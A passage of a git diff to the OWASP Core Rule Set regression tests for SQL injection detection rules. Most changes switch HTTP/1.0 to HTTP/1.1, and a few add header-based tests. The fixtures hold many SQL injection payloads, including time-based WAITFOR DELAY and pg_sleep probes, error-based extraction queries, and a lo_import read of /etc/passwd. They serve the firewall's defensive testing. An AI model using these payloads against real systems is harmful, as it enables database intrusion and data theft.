-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -782,7 +782,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2F3+and%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -799,7 +799,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2Fxxxx_R+AND+"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -816,7 +816,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2Fxxxx_R+or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942210]
@@ -833,7 +833,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D1+GROUP+BY+CONCAT%280x716a787671%2C%28SELECT+MID%28%28IFNULL%28CAST%28a_1_18+AS+CHAR%29%2C0x20%29%29%2C1%2C54%29+FROM+db_justiz_daz.ugesundheit_antworten+ORDER+BY+id+LIMIT+571%2C1%29%2C0x7178716b71%2CFLOOR%28RAND%280%29%2A2%29%29+HAVING+MIN%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -850,7 +850,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+backend_layout%21%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -867,7 +867,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+uid%21%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -884,7 +884,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dand+1%3D1%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -901,7 +901,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28l%3D%210%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -918,7 +918,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28e+%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -935,7 +935,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28e%3D%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -952,7 +952,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28null%3D%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -969,7 +969,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28a%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -986,7 +986,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28c%3D%211%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1003,7 +1003,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28d%21%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1020,7 +1020,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28g%3D%210%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1037,7 +1037,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28e%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1054,7 +1054,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28c%3D%210%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1071,7 +1071,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28f+%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1088,7 +1088,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28x%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1105,7 +1105,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26%28b%3D0%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1122,7 +1122,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28e%3D%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1139,7 +1139,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28c%3D%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1156,7 +1156,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26+1%3D%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1173,7 +1173,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=OR backend_layout= '"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1190,7 +1190,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=--alter"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1207,7 +1207,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=AND (name = \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1224,7 +1224,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=OR name = \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1241,7 +1241,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=AND ( name = \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1258,7 +1258,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=4oR2-"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1275,7 +1275,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=AND engine = '"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1292,7 +1292,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=and code != \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1309,7 +1309,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=and freigabe = \""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1326,7 +1326,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=AND 6698=("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1343,7 +1343,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=or class!=\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1360,7 +1360,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=or 4975==4975'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -1377,7 +1377,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=1 GROUP BY CONCAT(0x7162766a71,(SELECT (CASE WHEN (5554=5554) THEN 1 ELSE 0 END)),0x7171786271,FLOOR(RAND(0)*2)) HAVING MIN("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
index 969cb4116..a90b411e9 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?string_to_convert=4294967296"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942220]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?i=2.2250738585072011e-308"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942220]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
index 30d7bf3ad..8d77e9eec 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%29%20like%20%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%29like%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=I%20like%20you%21"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942230]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%20case%20when%20condition1%20then%20result1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -79,7 +79,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=having%20pain%21"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942230]
@@ -95,7 +95,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=SELECT%20x%20GROUP%20BY%20SOMETHING%20HAVING%20COUNT%28Id%29%20%3E%3D%209"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -111,7 +111,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=SELECT%20%2A%20FROM%20%60movies%60%20GROUP%20BY%20%60category_id%60%2C%60year_released%60%20HAVING%20%60category_id%60%20%3D%208%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -127,7 +127,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=behaving%20badly%2F"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942230]
@@ -143,7 +143,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=o.havingu%40gmail.com"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942230]
@@ -159,7 +159,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=if%282%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
@@ -175,7 +175,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=Just%20in%20case%20%28abc%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942230]
@@ -191,7 +191,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=if%281234%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942230]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
index 5e6aba9b7..d991525f0 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22+WAITFOR+DELAY+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%3Bwaitfor+delay+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%3BWAITFOR+DELAY+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%3B+waitfor+delay+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27+waitfor+delay+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%3B+WAITFOR+DELAY+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22+WAITFOR+DELAY+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%3BWAITFOR+DELAY+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%22%3Bwaitfor+delay+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=ALTER+TABLE+%60mass_mails%60+CHANGE+%60receivers%60+%60receivers%60+ENUM%28%27FACILITIES%27%2C%27APPLICATION_2015%27%2C%27APPLICATION_2016%27%29+CHARACTER+SET+utf8%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
@@ -186,7 +186,7 @@ tests:
           port: 80
           uri: "/post"
           data: "ALTER+TABLE+%60tx_v3appointment_domain_model_appointment%60+ADD+%60video%60+TEXT+CHARACTER+SET+latin1%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942240]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
index 02bad099f..62b9be44d 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942250.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=EXECUTE%20IMMEDIATE%20%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942250]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
index 1ac718e6f..40d6a321e 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942251.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942251]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=having%20fun"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942251]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
index 82641f3a8..18b14770d 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           # something LIKE '
           uri: "/get?var=something%20LIKE%20%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942260]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
index 0afc59e87..2c0553f9b 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=union%20select%20col%20from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942270]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=Xunionselectfrom"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942270]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
index 07d1d74fb..be6e7f3f7 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=select%20pg_sleep"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942280]
@@ -32,7 +32,40 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--"
-          version: HTTP/1.0
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942280]
+  - test_id: 3
+    desc: "SQL Server waitfor delay attack - Referer"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            Referer: "https://www.example.com/search?hl=en&q=testing-1 waitfor delay '0:0:15' --"
+          method: GET
+          port: 80
+          uri: "/get"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942280]
+  - test_id: 4
+    desc: "SQL Server waitfor delay attack - User-Agent"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36-1 waitfor delay '0:0:15' --"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: GET
+          port: 80
+          uri: "/get"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942280]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
index bac70548f..af1ce0c2e 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?mongoQ=%5b%24lte%5dasdfsd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942290]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/mongo/show.php?u_id[$regex]=2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942290]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/mongo/show.php?u_id[$regex]=2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942290]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
index 4d19c2760..b4006f91a 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=) when 234 then&foo=bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942300]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=) when 234 then&foo=bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942300]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=booked%20for%202021%28including%202020"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942300]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
index e198085a0..bc0d6a9d3 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
@@ -19,7 +19,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%22%27%20and%20%3d%20bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942310]
@@ -37,7 +37,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942310]
@@ -55,7 +55,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942310]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
index 59c8ca3dd..0cd407683 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=procedure%20analyse%20%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=exec+%28%40%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=declare+%40b%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=DECLARE%2F%2A%2A%2F%40x%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -83,7 +83,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=password::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -99,7 +99,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -115,7 +115,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=div(23,-2)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -131,7 +131,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=div+(23.23+,+2)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -147,7 +147,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -163,7 +163,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=lo_get(16400)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -179,7 +179,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=function(foo)::text"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -195,7 +195,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=function(foo)::bigint"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
@@ -211,7 +211,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=function(foo)::double%20precision"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942320]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
index 5a111a28a..774c445aa 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942321]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942321]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
index c17d7d27a..e08e8ef04 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%22%27&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942330]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\\\"1 or 1-"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942330]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\\x23"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942330]
@@ -69,7 +69,7 @@ tests:
           data: |
             "var=05111222333
             andy.surname@somedomain.com"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942330]
@@ -86,7 +86,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=05111222333 andy.surname@somedomain.com"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942330]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
index 88a871dbf..ec59d1b57 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           # in ( select * from
           uri: "/get?var=in%20%28%20select%20%2a%20from"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -33,7 +33,7 @@ tests:
           port: 80
           # except \tselect.1,2
           uri: "/get?var=except%20%09select.1%2C2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -50,7 +50,7 @@ tests:
           port: 80
           # except values (1,2)
           uri: "/get?var=except%20values(1%2C2)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -67,7 +67,7 @@ tests:
           port: 80
           # except selecting
           uri: "/get?var=except%20selecting"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942340]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=x'%20or%20array[id]%20is%20not%20null--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942340]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=x'%20or%20email~all(array[email]);analyze--"
-          version: HTTP/1.0
